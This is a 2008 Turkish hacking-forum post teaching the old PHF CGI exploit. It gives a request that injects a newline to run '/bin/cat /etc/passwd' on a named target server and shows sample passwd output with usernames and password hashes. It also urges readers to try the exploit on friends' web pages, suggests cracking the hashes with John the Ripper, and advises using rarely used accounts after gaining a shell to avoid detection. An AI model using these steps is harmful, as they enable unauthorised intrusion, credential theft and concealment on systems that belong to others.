Web Hack Nedır???

Aşağa gitmek

Web Hack Nedır???

Mesaj tarafından OkaY Bir Cuma Ağus. 15, 2008 2:54 pm

WEB
hacking bilgidim kadari ile ilk kez 1996 da FBI in web sitesini hack
etmek icin kullanilmis ve basarili olmustur. Tabi bu durum dan sonra
FBI bu hatasini gidermistir. Anlatacagim teknik aslinda PHF olarak
bilinir.Fakat bir cok eski server da hala uygulanmakta ve netice
alinabilmektedir ozellikle japon webcilerinde bu hataya cok rastlanilir
ornek vermek gerekirse:

http://www.mo.cs.tutsiki.ac.jp/cgi-b...%20/etc/passwd
Satirini browserinize yazip enter e basin bu satir passwd dosyasini acmaya calisacaktir(adresi attim)
Error 404
/cgi-bin/phf is not found on this server
Bu satirlar karsiniza cikarsa bilinki server yeni ve size gecit vermiyor
Ama asagidaki listeyi verirse bilinki buldunuz:)))
/cgi/phf?Qalias=x%0a/bin/cat%20/etc/passwd
root:2fkbNba29uWys:0:1:Operator:/:/bin/csh
www-admin:rYsKMjnvRppro:100:11:WWW administrator:/home/Common/WWW:/bin/csh
asprilla:3A62i9qr.YmO.:1012:10:kafka
CAFER:/home/user/asprilla:/usr/local/bin/tcsh
hasan:dvUMqNmeeENFs:1016:10:lois figo:/home/user/hasan:/bin/csh
necmettin:ewF90K0gwXVD6:1006:10:mehmet CAFER:/home/user/cafer:/bin/csh
güloglu:kFph8HEM/aaAA:1007:10:Kemal GULOGLU:/home/user/güloglu:/bin/csh

PHF
teknigini arkadaslarinizin web page larini hack etmek icin deniye
bilirsiniz:))) tabi yukardaki satirlari en iyi ihtimali goz onune
alinarak yazdim PHF bulsaniz bile muhtemelen shadow olacaktir yani
asagidaki gibi:

root:*:0:1:Operator:/:/bin/csh
www-admin:*:100:11:WWW administrator:/home/Common/WWW:/bin/csh
asprilla:*:1012:10:CAFER:/home/user/asprilla:/usr/local/bin/tcsh
hasan:*:1016:10:lois figo:/home/user/hasan:/bin/csh
necmettin:*:1006:10:mehmet CAFER:/home/user/cafer:/bin/csh
güloglu:*:1007:10:kemal GULOGLU:/home/user/güloglu:/bin/csh

Bu
tek * sifreleri kirdigini iddia eden bazi programlar var ama ben sadece
guluyorum shadowed kirmak bence imkansiz ama yinede john the ripper i
cekip deneyebilirsiniz.Hic bir teknik % 100 netice vermez bunu
unutmayin.olaki bir shell aldiniz veya kirdiniz diyelim en az
kullanilanini kullanin en son ne zaman kullanildigini anlamak icin
shell in ait oldugu servere port 79 dan baglanin username ve pw i yazin
en son baglanilan tarihi size verir az kullanilan accountlari kullanin.

_________________
"""Admin Destek"""

thee.bosfforumdestek@hotmail.com
avatar
OkaY
Administrator
Administrator

Erkek
Mesaj Sayısı : 424
Yaş : 28
Nerden : İsTaNbUL
İş/Hobiler : Pc - Thee.bosfforum
Ruh Haliniz :
Hangi Takımlısızı :
Tecrübe Puanı : 6
Kayıt tarihi : 30/07/08

Kullanıcı profilini gör http://thee.yetkinforum.net

Sayfa başına dön Aşağa gitmek

Sayfa başına dön


 
Bu forumun müsaadesi var:
Bu forumdaki mesajlara cevap veremezsiniz